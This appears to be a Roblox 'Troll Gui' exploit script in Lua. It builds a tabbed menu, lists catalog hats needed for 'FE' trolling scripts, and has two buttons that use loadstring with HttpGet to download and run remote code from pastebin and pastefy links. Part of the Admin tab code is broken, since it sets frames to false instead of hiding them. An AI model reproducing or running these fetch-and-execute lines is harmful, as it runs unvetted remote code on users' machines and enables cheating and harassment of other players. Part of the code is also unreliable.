-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local MainBoi = Instance.new("Frame")
local CLOSEGUI = Instance.new("TextButton")
local TROLOLOLOLO = Instance.new("TextLabel")
local TROLOLOLOLOLO = Instance.new("TextLabel")
local Frame = Instance.new("Frame")
local BUTTONS = Instance.new("ScrollingFrame")
local SettingTab = Instance.new("TextButton")
local VisualTab = Instance.new("TextButton")
local HatsTab = Instance.new("TextButton")
local nothinglisttttt = Instance.new("UIGridLayout")
local AdminTab = Instance.new("TextButton")
local FeTab = Instance.new("TextButton")
local Setting = Instance.new("ScrollingFrame")
local UIGridLayout = Instance.new("UIGridLayout")
local Admin = Instance.new("ScrollingFrame")
local UIGridLayout_2 = Instance.new("UIGridLayout")
local HatsRequired = Instance.new("ScrollingFrame")
local UIGridLayout_3 = Instance.new("UIGridLayout")
local ForPhyschopathAxe = Instance.new("TextBox")
local ForGaleFighter = Instance.new("TextBox")
local Notes = Instance.new("ScrollingFrame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local UIGridLayout_4 = Instance.new("UIGridLayout")
local Visual = Instance.new("ScrollingFrame")
local UIGridLayout_5 = Instance.new("UIGridLayout")
local Fe = Instance.new("ScrollingFrame")
local PhyschopathAxe = Instance.new("TextButton")
local GaleFighter = Instance.new("TextButton")
local UIGridLayout_6 = Instance.new("UIGridLayout")
local TROLLBUTTON = Instance.new("ImageButton")
local UICorner = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

MainBoi.Name = "MainBoi"
MainBoi.Parent = ScreenGui
MainBoi.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
MainBoi.Position = UDim2.new(0.216236725, 0, 0.238955826, 0)
MainBoi.Size = UDim2.new(0, 655, 0, 37)

CLOSEGUI.Name = "CLOSEGUI"
CLOSEGUI.Parent = MainBoi
CLOSEGUI.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CLOSEGUI.Position = UDim2.new(0.893129706, 0, 0.135135129, 0)
CLOSEGUI.Size = UDim2.new(0, 64, 0, 26)
CLOSEGUI.Font = Enum.Font.SourceSans
CLOSEGUI.Text = "Close Gui"
CLOSEGUI.TextColor3 = Color3.fromRGB(0, 0, 0)
CLOSEGUI.TextSize = 14.000

TROLOLOLOLO.Name = "TROLOLOLOLO"
TROLOLOLOLO.Parent = MainBoi
TROLOLOLOLO.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TROLOLOLOLO.Position = UDim2.new(0, 0, 0.0270270277, 0)
TROLOLOLOLO.Size = UDim2.new(0, 178, 0, 36)
TROLOLOLOLO.Font = Enum.Font.SourceSans
TROLOLOLOLO.Text = "Troll Gui"
TROLOLOLOLO.TextColor3 = Color3.fromRGB(0, 0, 0)
TROLOLOLOLO.TextSize = 14.000

TROLOLOLOLOLO.Name = "TROLOLOLOLOLO"
TROLOLOLOLOLO.Parent = MainBoi
TROLOLOLOLOLO.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TROLOLOLOLOLO.Position = UDim2.new(0.273282439, 0, 0.594594598, 0)
TROLOLOLOLOLO.Size = UDim2.new(0, 99, 0, 15)
TROLOLOLOLOLO.Font = Enum.Font.SourceSans
TROLOLOLOLOLO.Text = "Made By: xxsfytd"
TROLOLOLOLOLO.TextColor3 = Color3.fromRGB(0, 0, 0)
TROLOLOLOLOLO.TextSize = 14.000

Frame.Name = "Frame.."
Frame.Parent = MainBoi
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.Position = UDim2.new(-0.000557237014, 0, 0.988928676, 0)
Frame.Size = UDim2.new(0, 655, 0, 263)

BUTTONS.Name = "BUTTONS"
BUTTONS.Parent = Frame
BUTTONS.Active = true
BUTTONS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
BUTTONS.Position = UDim2.new(0, 0, 0.0988593176, 0)
BUTTONS.Size = UDim2.new(0, 179, 0, 201)

SettingTab.Name = "Setting Tab"
SettingTab.Parent = BUTTONS
SettingTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
SettingTab.Size = UDim2.new(0, 116, 0, 100)
SettingTab.Font = Enum.Font.SourceSans
SettingTab.Text = "Setting Tab"
SettingTab.TextColor3 = Color3.fromRGB(0, 0, 0)
SettingTab.TextSize = 14.000

VisualTab.Name = "Visual Tab"
VisualTab.Parent = BUTTONS
VisualTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
VisualTab.Size = UDim2.new(0, 116, 0, 100)
VisualTab.Font = Enum.Font.SourceSans
VisualTab.Text = "Visual Tab"
VisualTab.TextColor3 = Color3.fromRGB(0, 0, 0)
VisualTab.TextSize = 14.000

HatsTab.Name = "Hats Tab"
HatsTab.Parent = BUTTONS
HatsTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
HatsTab.Size = UDim2.new(0, 116, 0, 100)
HatsTab.Font = Enum.Font.SourceSans
HatsTab.Text = "Hats Requirement (For Fe)"
HatsTab.TextColor3 = Color3.fromRGB(0, 0, 0)
HatsTab.TextSize = 14.000

nothinglisttttt.Name = "nothing listtttt"
nothinglisttttt.Parent = BUTTONS
nothinglisttttt.SortOrder = Enum.SortOrder.LayoutOrder
nothinglisttttt.CellSize = UDim2.new(0, 165, 0, 50)

AdminTab.Name = "Admin Tab"
AdminTab.Parent = BUTTONS
AdminTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
AdminTab.Size = UDim2.new(0, 116, 0, 100)
AdminTab.Font = Enum.Font.SourceSans
AdminTab.Text = "Admin Tab"
AdminTab.TextColor3 = Color3.fromRGB(0, 0, 0)
AdminTab.TextSize = 14.000

FeTab.Name = "Fe Tab"
FeTab.Parent = BUTTONS
FeTab.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
FeTab.Size = UDim2.new(0, 116, 0, 100)
FeTab.Font = Enum.Font.SourceSans
FeTab.Text = "Fe Tab"
FeTab.TextColor3 = Color3.fromRGB(0, 0, 0)
FeTab.TextSize = 14.000

Setting.Name = "Setting"
Setting.Parent = Frame
Setting.Active = true
Setting.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Setting.Position = UDim2.new(0.297709912, 0, 0.0988593176, 0)
Setting.Size = UDim2.new(0, 446, 0, 201)
Setting.Visible = false
Setting.CanvasSize = UDim2.new(0, 0, 5, 0)

UIGridLayout.Parent = Setting
UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout.CellPadding = UDim2.new(0, 1, 0, 5)
UIGridLayout.CellSize = UDim2.new(0, 100, 0, 50)

Admin.Name = "Admin"
Admin.Parent = Frame
Admin.Active = true
Admin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Admin.Position = UDim2.new(0.297709912, 0, 0.0988593176, 0)
Admin.Size = UDim2.new(0, 446, 0, 201)
Admin.Visible = false
Admin.CanvasSize = UDim2.new(0, 0, 5, 0)

UIGridLayout_2.Parent = Admin
UIGridLayout_2.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout_2.CellPadding = UDim2.new(0, 1, 0, 5)
UIGridLayout_2.CellSize = UDim2.new(0, 100, 0, 50)

HatsRequired.Name = "HatsRequired"
HatsRequired.Parent = Frame
HatsRequired.Active = true
HatsRequired.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
HatsRequired.Position = UDim2.new(0.297709912, 0, 0.0988593176, 0)
HatsRequired.Size = UDim2.new(0, 446, 0, 201)
HatsRequired.Visible = false
HatsRequired.CanvasSize = UDim2.new(0, 0, 5, 0)

UIGridLayout_3.Parent = HatsRequired
UIGridLayout_3.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout_3.CellPadding = UDim2.new(0, 1, 0, 5)
UIGridLayout_3.CellSize = UDim2.new(0, 432, 0, 300)

ForPhyschopathAxe.Name = "ForPhyschopathAxe"
ForPhyschopathAxe.Parent = HatsRequired
ForPhyschopathAxe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ForPhyschopathAxe.Position = UDim2.new(-0.482062787, 0, -0.106463879, 0)
ForPhyschopathAxe.Size = UDim2.new(0, 432, 0, 150)
ForPhyschopathAxe.ClearTextOnFocus = false
ForPhyschopathAxe.Font = Enum.Font.SourceSans
ForPhyschopathAxe.Text = "Physchopath Axe: https://www.roblox.com/catalog/48474294/ROBLOX-Girl-Hair\\n\\nhttps://www.roblox.com/catalog/62724852/Chestnut-Bun\\n\\nhttps://www.roblox.com/catalog/451220849/Lavender-Updo\\n\\nhttps://www.roblox.com/catalog/4584042059/International-Fedora-Netherlands\\n\\nhttps://www.roblox.com/catalog/3409612660/International-Fedora-USA\\n\\nhttps://www.roblox.com/catalog/48474313/Red-Roblox-Cap\\n\\nhttps://www.roblox.com/catalog/12666716206/Golden-Apple\\n\\nhttps://www.roblox.com/catalog/9867487176/Le-Rouge-Cross-body-Bag-3-0\\n\\nhttps://www.roblox.com/catalog/12583828426/Pink-Cat-Ear-Headphones\\n\\nhttps://www.roblox.com/catalog/12103236257/AO-Surfboard\\n\\n"
ForPhyschopathAxe.TextColor3 = Color3.fromRGB(0, 0, 0)
ForPhyschopathAxe.TextScaled = true
ForPhyschopathAxe.TextSize = 14.000
ForPhyschopathAxe.TextWrapped = true

ForGaleFighter.Name = "ForGaleFighter"
ForGaleFighter.Parent = HatsRequired
ForGaleFighter.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ForGaleFighter.Position = UDim2.new(-0.632286966, 0, -0.0608365014, 0)
ForGaleFighter.Size = UDim2.new(0, 432, 0, 150)
ForGaleFighter.ClearTextOnFocus = false
ForGaleFighter.Font = Enum.Font.SourceSans
ForGaleFighter.Text = "Gale Fighter: https://www.roblox.com/catalog/376527115/Jade-Necklace-with-Shell-Pendant\\n \\nhttps://www.roblox.com/catalog/63690008/Pal-Hair\\n \\nhttps://www.roblox.com/catalog/48474313/Red-Roblox-Cap\\n "
ForGaleFighter.TextColor3 = Color3.fromRGB(0, 0, 0)
ForGaleFighter.TextScaled = true
ForGaleFighter.TextSize = 14.000
ForGaleFighter.TextWrapped = true

Notes.Name = "Notes"
Notes.Parent = Frame
Notes.Active = true
Notes.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Notes.Position = UDim2.new(0.297709912, 0, 0.0988593176, 0)
Notes.Size = UDim2.new(0, 446, 0, 201)
Notes.CanvasSize = UDim2.new(0, 0, 5, 0)

TextLabel.Parent = Notes
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Welcome to the Troll Gui. Thanks for using the script."
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Notes
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Version 0.1"
TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = Notes
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.Size = UDim2.new(0, 200, 0, 50)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Updates :"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

UIGridLayout_4.Parent = Notes
UIGridLayout_4.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout_4.CellSize = UDim2.new(0, 432, 0, 100)

Visual.Name = "Visual"
Visual.Parent = Frame
Visual.Active = true
Visual.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Visual.Position = UDim2.new(0.297709912, 0, 0.0988593176, 0)
Visual.Size = UDim2.new(0, 446, 0, 201)
Visual.Visible = false
Visual.CanvasSize = UDim2.new(0, 0, 5, 0)

UIGridLayout_5.Parent = Visual
UIGridLayout_5.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout_5.CellPadding = UDim2.new(0, 1, 0, 5)
UIGridLayout_5.CellSize = UDim2.new(0, 100, 0, 50)

Fe.Name = "Fe"
Fe.Parent = Frame
Fe.Active = true
Fe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Fe.Position = UDim2.new(0.297709912, 0, 0.0988593176, 0)
Fe.Size = UDim2.new(0, 446, 0, 201)
Fe.Visible = false
Fe.CanvasSize = UDim2.new(0, 0, 5, 0)

PhyschopathAxe.Name = "PhyschopathAxe"
PhyschopathAxe.Parent = Fe
PhyschopathAxe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
PhyschopathAxe.Size = UDim2.new(0, 200, 0, 50)
PhyschopathAxe.Font = Enum.Font.SourceSans
PhyschopathAxe.Text = "Physchopath Axe"
PhyschopathAxe.TextColor3 = Color3.fromRGB(0, 0, 0)
PhyschopathAxe.TextSize = 14.000

GaleFighter.Name = "GaleFighter"
GaleFighter.Parent = Fe
GaleFighter.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
GaleFighter.Size = UDim2.new(0, 200, 0, 50)
GaleFighter.Font = Enum.Font.SourceSans
GaleFighter.Text = "Gale Fighter"
GaleFighter.TextColor3 = Color3.fromRGB(0, 0, 0)
GaleFighter.TextSize = 14.000

UIGridLayout_6.Parent = Fe
UIGridLayout_6.SortOrder = Enum.SortOrder.LayoutOrder
UIGridLayout_6.CellPadding = UDim2.new(0, 1, 0, 5)
UIGridLayout_6.CellSize = UDim2.new(0, 100, 0, 50)

TROLLBUTTON.Name = "TROLLBUTTON"
TROLLBUTTON.Parent = ScreenGui
TROLLBUTTON.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TROLLBUTTON.BorderColor3 = Color3.fromRGB(255, 0, 0)
TROLLBUTTON.Position = UDim2.new(0.962586999, 0, 0.917670786, 0)
TROLLBUTTON.Size = UDim2.new(0, 39, 0, 40)
TROLLBUTTON.Image = "http://www.roblox.com/asset/?id=10693327318"

UICorner.Parent = TROLLBUTTON

-- Scripts:

local function YMJJYSG_fake_script() -- ScreenGui.LocalScript 
	local script = Instance.new('LocalScript', ScreenGui)

	script.Parent.ResetOnSpawn = false
end
coroutine.wrap(YMJJYSG_fake_script)()
local function IFCNROC_fake_script() -- MainBoi.LocalScript 
	local script = Instance.new('LocalScript', MainBoi)

	script.Parent.Draggable = true
	script.Parent.Active = true
end
coroutine.wrap(IFCNROC_fake_script)()
local function WWFRVS_fake_script() -- CLOSEGUI.LocalScript 
	local script = Instance.new('LocalScript', CLOSEGUI)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.MainBoi.Visible = false
		script.Parent.Parent.Parent.TROLLBUTTON.Visible = true
	end)
end
coroutine.wrap(WWFRVS_fake_script)()
local function GGWWM_fake_script() -- SettingTab.LocalScript 
	local script = Instance.new('LocalScript', SettingTab)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Admin.Visible = false
		script.Parent.Parent.Parent.Fe.Visible = false
		script.Parent.Parent.Parent.Setting.Visible = true
		script.Parent.Parent.Parent.Visual.Visible = false
		script.Parent.Parent.Parent.Notes.Visible = false
		script.Parent.Parent.Parent.HatsRequired.Visible = false
	end)
end
coroutine.wrap(GGWWM_fake_script)()
local function PYVON_fake_script() -- VisualTab.LocalScript 
	local script = Instance.new('LocalScript', VisualTab)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Admin.Visible = false
		script.Parent.Parent.Parent.Fe.Visible = false
		script.Parent.Parent.Parent.Setting.Visible = false
		script.Parent.Parent.Parent.Visual.Visible = true
		script.Parent.Parent.Parent.Notes.Visible = false
		script.Parent.Parent.Parent.HatsRequired.Visible = false
	end)
end
coroutine.wrap(PYVON_fake_script)()
local function LPIVGH_fake_script() -- HatsTab.LocalScript 
	local script = Instance.new('LocalScript', HatsTab)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Admin.Visible = false
		script.Parent.Parent.Parent.Fe.Visible = false
		script.Parent.Parent.Parent.Setting.Visible = false
		script.Parent.Parent.Parent.Visual.Visible = false
		script.Parent.Parent.Parent.Notes.Visible = false
		script.Parent.Parent.Parent.HatsRequired.Visible = true
	end)
end
coroutine.wrap(LPIVGH_fake_script)()
local function RWBUX_fake_script() -- AdminTab.LocalScript 
	local script = Instance.new('LocalScript', AdminTab)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Admin.Visible = true
		script.Parent.Parent.Parent.Fe = false
		script.Parent.Parent.Parent.Setting = false
		script.Parent.Parent.Parent.Visual = false
		script.Parent.Parent.Parent.Notes = false
		script.Parent.Parent.Parent.HatsRequired.Visible = false
	end)
end
coroutine.wrap(RWBUX_fake_script)()
local function RWXJS_fake_script() -- FeTab.LocalScript 
	local script = Instance.new('LocalScript', FeTab)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Admin.Visible = false
		script.Parent.Parent.Parent.Fe.Visible = true
		script.Parent.Parent.Parent.Setting.Visible = false
		script.Parent.Parent.Parent.Visual.Visible = false
		script.Parent.Parent.Parent.Notes.Visible = false
		script.Parent.Parent.Parent.HatsRequired.Visible = false
	end)
end
coroutine.wrap(RWXJS_fake_script)()
local function KKLYUP_fake_script() -- PhyschopathAxe.LocalScript 
	local script = Instance.new('LocalScript', PhyschopathAxe)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://pastebin.com/raw/EbBZ0vsC'),true))() -- Physchopath Axe
	end)
end
coroutine.wrap(KKLYUP_fake_script)()
local function IGFP_fake_script() -- GaleFighter.LocalScript 
	local script = Instance.new('LocalScript', GaleFighter)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://pastefy.ga/w08T3Ib1/raw'),true))() -- Gale Fighter
	end)
end
coroutine.wrap(IGFP_fake_script)()
local function RATVGWX_fake_script() -- TROLLBUTTON.LocalScript 
	local script = Instance.new('LocalScript', TROLLBUTTON)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.MainBoi.Visible = true
		script.Parent.Parent.TROLLBUTTON.Visible = false
	end)
end
coroutine.wrap(RATVGWX_fake_script)()
